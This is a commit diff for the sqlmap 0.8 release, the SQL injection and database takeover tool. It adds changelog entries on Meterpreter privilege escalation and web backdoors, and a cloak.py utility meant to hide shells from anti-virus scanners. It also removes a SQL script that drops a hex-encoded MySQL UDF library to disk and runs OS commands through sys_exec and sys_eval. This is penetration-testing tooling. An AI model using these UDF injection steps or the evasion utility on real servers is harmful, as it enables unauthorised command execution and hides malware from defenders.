sqlmap 0.8 stable!

1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed
2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays.
Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter.

Minor layout adjustments.

doc/AUTHORS

@@ -1,3 +1,7 @@
 Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
 <bernardo.damele@gmail.com>
 PGP Key ID: 0x05F5A30F
+
+Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
+<miroslav.stampar@gmail.com>
+PGP Key ID: 0xB5397B1B

doc/ChangeLog

@@ -1,3 +1,68 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Support to enumerate and dump all databases' tables containing user
+    provided column(s) by specifying for instance '--dump -C user,pass'.
+    Useful to identify for instance tables containing custom application
+    credentials (Bernardo).
+  * Support to parse -C (column name(s)) when fetching
+    columns of a table with --columns: it will enumerate only columns like
+    the provided one(s) within the specified table (Bernardo).
+  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
+  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
+    'getsystem' command to elevate privileges of the user running the
+    back-end DBMS instance to SYSTEM on Windows (Bernardo).
+  * Automatic support in --os-pwn to use the web uploader/backdoor to
+    upload and execute the Metasploit payload stager when stacked queries
+    SQL injection is not supported, for instance on MySQL/PHP and
+    MySQL/ASP, but there is a writable folder within the web server
+    document root (Bernardo and Miroslav).
+  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
+    useful when web application does not support stacked queries (Bernardo).
+  * Added support to properly read (--read-file) also binary files via
+    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
+    function (Bernardo and Miroslav).
+  * Updated active fingerprint and comment injection fingerprint for
+    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
+  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
+  * Support for NTLM authentication via python-ntlm third party library,
+    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
+  * Support to automatically decode deflate, gzip and x-gzip HTTP
+    responses (Miroslav).
+  * Support for Certificate authentication, --auth-cert option added
+    (Miroslav).
+  * Added support for regular expression based scope when parsing Burp or
+    Web Scarab proxy log file (-l), --scope (Miroslav).
+  * Added option (-r) to load a single HTTP request from a text file
+    (Miroslav).
+  * Added option (--ignore-proxy) to ignore system default HTTP proxy
+    (Miroslav).
+  * Added support to ignore Set-Cookie in HTTP responses,
+    --drop-set-cookie (Miroslav).
+  * Added support to specify which Google dork result page to parse,
+    --gpage to be used together with -g (Miroslav).
+  * Major bug fix and enhancements to the multi-threading (--threads)
+    functionality (Miroslav).
+  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
+    (Miroslav).
+  * Refactored --update to use python-svn third party library if available
+    or 'svn' command to update sqlmap to the latest development version
+    from subversion repository (Bernardo and Miroslav).
+  * Major bugs fixed (Bernardo and Miroslav).
+  * Cleanup of UDF source code repository,
+    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
+    and Miroslav).
+  * Major code cleanup (Miroslav).
+  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
+    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
+    shells consequently reducing drastically the number of anti-virus
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
+  * Updated user's manual (Bernardo and Miroslav).
+  * Created several demo videos, hosted on YouTube
+    (http://www.youtube.com/user/inquisb) and linked from
+    http://sqlmap.sourceforge.net/demo.html (Bernardo).
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
+
 sqlmap (0.8rc1-1) stable; urgency=low
 
   * Major enhancement to the Microsoft SQL Server stored procedure

doc/THANKS

@@ -1,10 +1,16 @@
 == Individuals ==
 
+David Alvarez <david.alvarez.s@gmail.com>
+    for reporting a bug
+
 Chip Andrews <chip@sqlsecurity.com>
     for his excellent work maintaining the SQL Server versions database
     at SQLSecurity.com and permission to implement the update feature
     taking data from his site
 
+Otavio Augusto <otavioarj@gmail.com>
+    for reporting a minor bug
+
 Simon Baker <simonb@sec-1.com>
     for reporting some bugs
 
@@ -12,9 +18,15 @@ Daniele Bellucci <daniele.bellucci@gmail.com>
     for starting sqlmap project and developing it between July and August
     2006
 
+Velky Brat <velkybrat@gmail.com>
+    for suggesting a minor enhancement to the bisection algorithm
+
 Jack Butler <fattredd@hotmail.com>
     for providing me with the sqlmap site favicon
 
+Roberto Castrogiovanni <castrogiovanni.roberto@gmail.com>
+    for reporting a minor bug
+
 Cesar Cerrudo <cesar@argeniss.com>
     for his Windows access token kidnapping tool Churrasco included in
     sqlmap tree as a contrib library and used to run the stand-alone
@@ -66,9 +78,15 @@ Giorgio Fedon <giorgio.fedon@gmail.com>
     for suggesting a speed improvement for bisection algorithm
     for reporting a bug when running against Microsoft SQL Server 2005
 
+Kasper Fons <thefeds@mail.dk>
+    for reporting a bug
+
 Alan Franzoni <alan.franzoni@gmail.com>
     for helping me out with Python subprocess library
 
+Daniel G. Gamonal <lgrecol@gmail.com>
+    for reporting a minor bug
+
 Ivan Giacomelli <truemilk@insiberia.net>
     for reporting a bug
     for suggesting a minor enhancement
@@ -92,8 +110,8 @@ Will Holcomb <wholcomb@gmail.com>
     for his MultipartPostHandler class to handle multipart POST forms and
     permission to include it within sqlmap source code
 
-Daniel Hückmann <sanitybit@gmail.com>
+Daniel Huckmann <sanitybit@gmail.com>
-    for reporting a minor bug
+    for reporting a couple of bugs
 
 Mounir Idrassi <mounir.idrassi@idrix.net>
     for his compiled version of UPX for Mac OS X
@@ -113,6 +131,9 @@ Anant Kochhar <anant.kochhar@secureyes.net>
 Alexander Kornbrust <ak@red-database-security.com>
     for reporting a couple of bugs
 
+Krzysztof Kotowicz <kkotowicz@gmail.com>
+    for reporting a minor bug
+
 Nicolas Krassas <krasn@ans.gr>
     for reporting a bug
 
@@ -123,7 +144,8 @@ Guido Landi <lists@keamera.org>
     'sp_replwritetovarbin' stored procedure heap-based buffer overflow
     (MS09-004) exploit development
     for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
-    on September 21, 2009
+    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
+    November 20, 2009
 
 Lee Lawson <Lee.Lawson@dns.co.uk>
     for reporting a minor bug
@@ -249,7 +271,7 @@ Bedirhan Urgun <bedirhanurgun@gmail.com>
     for benchmarking sqlmap in the context of his SQL injection
     benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 
-Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
     for reporting an unhandled connection exception
 
 Anthony Zboralski <anthony.zboralski@bellua.com>
@@ -257,12 +279,18 @@ Anthony Zboralski <anthony.zboralski@bellua.com>
     for reporting a few minor bugs
     for donating to sqlmap development
 
+dsu <dsu@dsu.com.ua>
+    for reporting a bug
+
 fufuh <fufuh@users.sourceforge.net>
     for reporting a bug when running on Windows
 
 mariano <marianoso@gmail.com>
     for reporting a bug
 
+pacman730 <pacman730@users.sourceforge.net>
+    for reporting a bug
+
 Stuffe <stuffe.dk@gmail.com>
     for reporting a minor bug and a feature request
 

extra/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/README.txt

@@ -0,0 +1,22 @@
+To use cloak.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
+
+This will create an encrypted and compressed binary file backdoor.asp_.
+
+Such file can then be converted to its original form by using the -d
+functionality of the cloak.py program:
+
+$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
+
+If you skip the output file name, general rule is that the compressed
+file names are suffixed with the character '_', while the original is
+get by skipping the last character. So, that means that the upper
+examples can also be written in the following form:
+
+$ python ./cloak.py -i backdoor.asp
+
+$ python ./cloak.py -d -i backdoor.asp_

extra/cloak/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/cloak.py

@@ -0,0 +1,93 @@
+#!/usr/bin/env python
+
+"""
+cloak.py - Simple file encryption/compression utility
+Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
+email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import bz2
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def hideAscii(data):
+    retVal = ""
+    for i in xrange(len(data)):
+        if ord(data[i]) < 128:
+            retVal += chr(ord(data[i]) ^ 127)
+        else:
+            retVal += data[i]
+            
+    return retVal
+
+def cloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.compress(f.read())
+    f.close()
+    
+    return hideAscii(data)
+        
+def decloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.decompress(hideAscii(f.read()))
+    f.close()
+    
+    return data
+
+def main():
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+    
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+    
+    if not args.decrypt:
+        data = cloak(args.inputFile)
+    else:
+        data = decloak(args.inputFile)
+
+    if not args.outputFile:
+        if not args.decrypt:
+            args.outputFile = args.inputFile + '_'
+        else:
+            args.outputFile = args.inputFile[:-1]
+        
+    fpOut      = open(args.outputFile, 'wb')
+    sys.stdout = fpOut
+    sys.stdout.write(data)
+    sys.stdout.close()
+
+
+if __name__ == '__main__':
+    main()

extra/dbgtool/README.txt

@@ -18,7 +18,3 @@ To be able to execute it on Windows you have to rename it to end with
 '.com' or '.exe':
 
 > ren nc_exe nc.exe
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/dbgtool/dbgtool.py

@@ -2,7 +2,7 @@
 
 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (C) 2009  Bernardo Damele A. G.
+Copyright (C) 2009-2010  Bernardo Damele A. G.
 web: http://bernardodamele.blogspot.com/
 email: bernardo.damele@gmail.com
 
@@ -21,8 +21,6 @@ License along with this library; if not, write to the Free Software
 Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 import sys
 import struct
@@ -30,7 +28,6 @@ import struct
 from optparse import OptionError
 from optparse import OptionParser
 
-
 def convert(inputFile):
     fileStat = os.stat(inputFile)
     fileSize = fileStat.st_size
@@ -74,7 +71,6 @@ def convert(inputFile):
 
     return script
         
-
 def main(inputFile, outputFile):
     if not os.path.isfile(inputFile):
         print 'ERROR: the provided input file \'%s\' is not a regular file' % inputFile
@@ -90,7 +86,6 @@ def main(inputFile, outputFile):
     else:
         print script
         
-
 if __name__ == '__main__':
     usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
     parser  = OptionParser(usage=usage, version='0.1')

extra/msfauxmod/README.txt

@@ -76,7 +76,3 @@ SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/mysqludfsys/command_execution/linux.sql

@@ -1,120 +0,0 @@
--- Notes:
--- 
--- The SO compiled using MySQL 5.0.67 C libraries works also on MySQL
--- 5.1.30 and MySQL 4.1.22 (TODO: confirm)
--- 
--- SO compiled using MySQL 5.1.30 C libraries
--- lib_mysqludf_sys.so: 12896 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_mysqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- SO compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x7f454c46010101000000000000000000030003000100000010080000340000007c1100000000000034002000050028001900180001000000000000000000000000000000bc0e0000bc0e0000050000000010000001000000040f0000041f0000041f00000801000010010000060000000010000002000000180f0000181f0000181f0000d0000000d0000000060000000400000051e574640000000000000000000000000000000000000000060000000400000052e57464040f0000041f0000041f0000fc000000fc00000004000000010000001100000024000000000000000d00000000000000030000001a00000000000000070000001b0000000a000000140000000f000000150000000c0000000e0000001e000000060000001c000000000000000000000000000000010000000000000000000000020000000400000000000000230000002200000000000000130000001d000000170000000b000000000000000000000005000000090000002100000011000000000000001800000020000000080000001f0000000000000010000000000000001900000000000000160000000000000012000000000000001100000010000000040000000700000001080440801946c99ca40803900460831000000012000000130000001500000016000000180000001b0000001d0000000000);
-UPDATE udftest SET data=CONCAT(data,0x00001e000000000000001f0000002000000021000000220000002300000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed971581ca868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff3b9fd4a0ad73d1c50b5911feab5fbe12000000000000000000000000000000009500000000000000000000001200000001000000000000000000000020000000250000000000000000000000200000009b0000000000000000000000120000007201000000000000000000001200000039010000000000000000000012000000a3000000000000000000000012000000ab00000000000000000000001200000065010000000000000000000012000000480100000000000000000000120000008e000000000000000000000012000000b8000000000000000000000012000000160000000000000000000000220000004f010000000000000000000012000000b1000000000000000000000012000000400100006a0d00008b00000012000b0075000000db0800000500000012000b0010000000980e00000000000012000c00ff0000008d0c00004b00000012000b00df000000ac07000000000000120009008a0100000c200000000000001000f1ff300100004d0d00001d00000012000b009601000014200000000000001000f1ff);
-UPDATE udftest SET data=CONCAT(data,0x56000000d10800000500000012000b00c90000001f0a00007300000012000b006a0100000f0e00004500000012000b0039000000cc0800000500000012000b00f2000000140c00007900000012000b00830100000c200000000000001000f1ff65000000d60800000500000012000b00e5000000050b00000f01000012000b00d7000000920a00007300000012000b0015010000d80c00007500000012000b0056010000f50d00001a00000012000b0085000000e00800003f01000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f63007374726e6370790066676574730070636c6f7365005f5f737461636b5f63686b5f6661696c007379735f6576616c5f696e6974007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379);
-UPDATE udftest SET data=CONCAT(data,0x735f657865630073797374656d007379735f736574006d656d63707900736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3400474c4942435f322e3000474c4942435f322e310000000002000000000003000300030003000300030003000300040005000300020001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000400790100001000000000000000731f6909000005009b010000100000001469690d00000400a7010000100000001069690d00000300b1010000100000001169690d00000200bb010000000000001e09000008000000082000000800000014090000020b0000c50b0000020b00002b090000020100006a090000020400008b09000002070000b109000002080000c3090000020f0000100a0000020c00005f0d0000020600009c0d0000020a0000c10d0000020a0000df0d0000020e0000090e000002090000220e000002050000e81f000006020000ec1f000006030000f01f0000060d0000002000000702000004200000070d00005589e55383ec04e8000000005b81c33c1800008b93f4ffffff85d274);
-UPDATE udftest SET data=CONCAT(data,0x05e81e000000e8bd000000e888060000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff000000005589e55653e8ad00000081c3da17000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8b8ffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c35b17000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35589e557565381ec2c0400008b5d0c8b45148985d8fbffff8b55188995d4fbffff65a1140000008945f031c0c7042401000000e8fcffffff89c6c7442404b40e00008b43088b00890424e8fcffffff8985dcfbffffc785e0fbffff00000000eb548dbdf0fbffffb800000000b9fffffffff2ae89c8f7d08d78ff8b9de0fbffff01fb895c2404893424e8fcffffff89c6897c24088d95f0fbffff895424048b95e0fbffff8d0410890424e8fcffffff899de0fbffff8b85dcfbffff89442408c7442404000400008d95f0fbffff891424e8fcffffff85c075888b);
-UPDATE udftest SET data=CONCAT(data,0x85dcfbffff890424e8fcffffff803e00740485f6750b8b95d4fbffffc60201eb268b85e0fbffffc64406ff0089f7b800000000b9fffffffff2aef7d183e9018b95d8fbffff890a89f08b55f0653315140000007405e8fcffffff81c42c0400005b5e5f5dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e55383ec048b550c8b5d10833a027444c70345787065c7430463746564c7430820657861c7430c63746c79c743102074776fc7431420617267c74318756d656e66c7431c7473c6431e00ba01000000e9b10000008b4204833800744cc70345787065c7430463746564c7430820737472c7430c696e6720c7431074797065c7431420666f72c74318206e616dc7431c65207061c7432072616d65c7432474657200ba010000);
-UPDATE udftest SET data=CONCAT(data,0x00eb5dc74004000000008b520c8b0283c002034204890424e8fcffffff8b550889420cba0000000085c07534c703436f756cc7430464206e6fc743087420616cc7430c6c6f6361c743107465206dc74314656d6f7266c743187900ba0100000089d083c4045b5dc35589e58b450c8b551083380175158b4004833800750d8b4508c60001b800000000eb54c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b8010000005dc35589e58b4510c7006c69625fc740046d797371c740086c756466c7400c5f737973c7401020766572c7401473696f6ec7401820302e3066c7401c2e33c6401e008b5514c7021e0000005dc35589e58b5510b9000000008b450c833800745ec7024e6f2061c742047267756dc74208656e7473c7420c20616c6cc742106f776564c7421420287564c74218663a206cc7421c69625f6dc742207973716cc742247564665fc742287379735fc7422c696e666f66c742302900b90100000089c85dc35589e583ec088b450c8b40088b00890424e8fcffffff89c2c1fa1fc9c35589e583ec18895df48975f8897dfc8b5d0c8b45088b700c8b430c8b108d7c16018b43088b008954240889442404893424e8fcff);
-UPDATE udftest SET data=CONCAT(data,0xffff8b430c8b00c60406008b530c8b43088b48048b420489442408894c2404893c24e8fcffffff8b430c8b4004c6040700c744240801000000897c2404893424e8fcffffff89c2c1fa1f8b5df48b75f88b7dfc89ec5dc35589e583ec088b45088b400c85c07408890424e8fcffffffc9c35589e55783ec048b450c8b40088b00890424e8fcffffff89c285c075088b4518c60001eb1889c7b800000000b9fffffffff2aef7d183e9018b4514890889d083c4045f5dc39090909090909090909090905589e55653e85dfaffff81c38a1100008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c350110000e860f9ffff595bc9c37200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000790100000c000000ac0700000d000000980e000004000000d4000000f5feff6fb001000005000000a404000006000000640200000a000000c50100000b0000001000000003000000f41f000002000000100000001400000011000000170000009c07000011000000040700001200000098000000);
-UPDATE udftest SET data=CONCAT(data,0x13000000080000001600000000000000feffff6fb4060000ffffff6f01000000f0ffff6f6a060000faffff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000181f00000000000000000000f20700000208000008200000004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e74000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000d4000000d4000000dc000000030000000000000004000000040000000b000000f6ffff6f02000000b0010000b0010000b400000003000000000000000400000004000000150000000b00000002000000640200006402000040020000040000000100000004000000100000001d0000000300000002000000a4040000a4040000c50100000000000000000000010000000000000025000000ffffff6f020000006a0600006a060000480000000300000000000000020000000200000032000000feffff6f02000000b4060000b40600005000000004000000010000000400000000000000410000000900000002000000040700000407000098000000030000000000000004000000080000004a00000009000000020000009c0700009c07000010000000030000000a0000000400000008000000530000000100000006000000ac070000ac07000030000000000000000000000004000000000000004e0000000100000006000000dc070000dc0700003000000000000000000000000400000004000000590000000100000006000000100800001008000088060000000000000000000010000000000000005f0000000100000006000000980e0000980e00001c000000);
-UPDATE udftest SET data=CONCAT(data,0x00000000000000000400000000000000650000000100000032000000b40e0000b40e000002000000000000000000000001000000010000006d0000000100000002000000b80e0000b80e00000400000000000000000000000400000000000000770000000100000003000000041f0000040f000008000000000000000000000004000000000000007e00000001000000030000000c1f00000c0f00000800000000000000000000000400000000000000850000000100000003000000141f0000140f000004000000000000000000000004000000000000008a0000000600000003000000181f0000180f0000d000000004000000000000000400000008000000930000000100000003000000e81f0000e80f00000c00000000000000000000000400000004000000980000000100000003000000f41f0000f40f00001400000000000000000000000400000004000000a1000000010000000300000008200000081000000400000000000000000000000400000000000000a700000008000000030000000c2000000c1000000800000000000000000000000400000000000000ac0000000100000000000000000000000c100000b90000000000000000000000010000000000000001000000030000000000000000000000c5100000b500000000000000000000000100000000000000);
-
-
--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- Note that /TODO/plugin DOES NOT
--- exist by default so it is NOT possible to save the SO in the proper
--- folder where MySQL server looks for SOs.
--- SHOW VARIABLES WHERE variable_name='plugin_dir';
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The SO can be only in /TODO
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 6.0
---
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The SO can be in either /lib, /usr/lib or one of the paths specified in
--- /etc/ld.so.conf file, none of these paths are writable by mysql user by
--- default (tested on MySQL 5.0.67 with NO plugin_dir set in my.cnf
--- configuration file, which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
-SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user mysql does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into /var/lib/mysql/. It is not a valid PATH
--- where MySQL looks for SO
--- SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.so';
--- The following will save into /var/lib/mysql/mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for SO
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql
--- The following would save into / (Permission denied)
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.so';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_mysqludf_sys.txt'); -- -rw-rw---- 1 mysql    mysql
-SELECT sys_eval('cat /tmp/lib_mysqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/command_execution/windows.sql

@@ -1,128 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using MySQL 5.1.30 C libraries works also on MySQL
--- 5.0.67 and MySQL 4.1.22
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
